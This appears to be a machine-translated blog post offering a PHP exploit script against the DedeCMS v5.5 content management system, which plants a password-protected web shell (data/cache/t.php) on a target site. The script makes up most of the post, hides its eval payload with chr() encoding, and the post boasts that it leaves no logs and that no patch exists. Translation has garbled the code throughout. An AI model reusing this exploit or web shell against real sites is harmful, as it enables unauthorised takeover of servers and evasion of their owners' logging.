Chinadu's Blog
No official patch is available, but I guess it's faster.
If the execution is successful, t. php will be generated in data/cache for a pony.
Password t. This vulnerability exists in the latest official GBK and UTF-8 versions,
This exp is characterized by the absence of logs when producing t. php.
<? Php
Print_r (
+ ---------------------------------------- +
Dedecms v5.5 final getwebshell exploit
+ ---------------------------------------- +
);
If ($ argc <3 ){
Print_r (
+ ---------------------------------------- +
Usage: php. $ argv [0]. host path
Host: target server (ip/hostname)
Path: path to dedecms
Example:
Php. $ argv [0]. localhost/dedecms/
+ ---------------------------------------- +
);
Exit;
}
Error_reporting (7 );
Ini_set (max_execution_time, 0 );
$ Host = $ argv [1];
$ Path = $ argv [2];
$ Post_a = plus/digg_ajax.php? Id = 1024e1024 & */fputs (fopen (chr (46). chr (46). chr (47). chr (100). chr (97)
. Chr (116). chr (97). chr (47). chr (99). chr (97). chr (99). chr (104)
. Chr (101). chr (47). chr (116). chr (46). chr (112). chr (104)
. Chr (112), chr (119). chr (43), chr (60). chr (63). chr (112)
. Chr (104). chr (112). chr (32). chr (101). chr (118). chr (97)
. Chr (108). chr (40). chr (36). chr (95). chr (80). chr (79)
. Chr (83). chr (84). chr (91). chr (39). chr (116). chr (39)
. Chr (93). chr (41). chr (59). chr (63). chr (62 ));/*;
$ Post_ B = needCode = aa/.../../data/mysql_error_trace;
$ Shell = data/cache/t. php;
Get_send ($ post_a );
Post_send (plus/comments_frame.php, $ post_ B );
$ Content = post_send ($ shell, t = echo tojen ;);
If (substr ($ content, 9, 3) = 200 ){
Echo "Shell Address is:". $ host. $ path. $ shell;
} Else {
Echo "Error .";
}
Function get_send ($ url ){
Global $ host, $ path;
$ Message = "GET". $ path. "$ url HTTP/1.1 ";
$ Message. = "Accept :*/*";
$ Message. = "Referer: http: // $ host $ path ";
$ Message. = "Accept-Language: zh-cn ";
$ Message. = "Content-Type: application/x-www-form-urlencoded ";
$ Message. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1 )";
$ Message. = "Host: $ host ";
$ Message. = "Connection: Close ";
$ Fp = fsockopen ($ host, 80 );
If (! $ Fp ){
Echo "Connect to host Error ";
}
Fputs ($ fp, $ message );
$ Back =;
While (! Feof ($ fp ))
$ Back. = fread ($ fp, 1024 );
Fclose ($ fp );
Return $ back;
}
Function post_send ($ url, $ cmd ){
Global $ host, $ path;
$ Message = "POST". $ path. "$ url HTTP/1.1 ";
$ Message. = "Accept :*/*";
$ Message. = "Referer: http: // $ host $ path ";
$ Message. = "Accept-Language: zh-cn ";
$ Message. = "Content-Type: application/x-www-form-urlencoded ";
$ Message. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1 )";
$ Message. = "Host: $ host ";
$ Message. = "Content-Length:". strlen ($ cmd )."";
$ Message. = "Connection: Close ";
$ Message. = $ cmd;
$ Fp = fsockopen ($ host, 80 );
If (! $ Fp ){
Echo "Connect to host Error ";
}
Fputs ($ fp, $ message );
$ Back =;
While (! Feof ($ fp ))
$ Back. = fread ($ fp, 1024 );
Fclose ($ fp );
Return $ back;
}
?>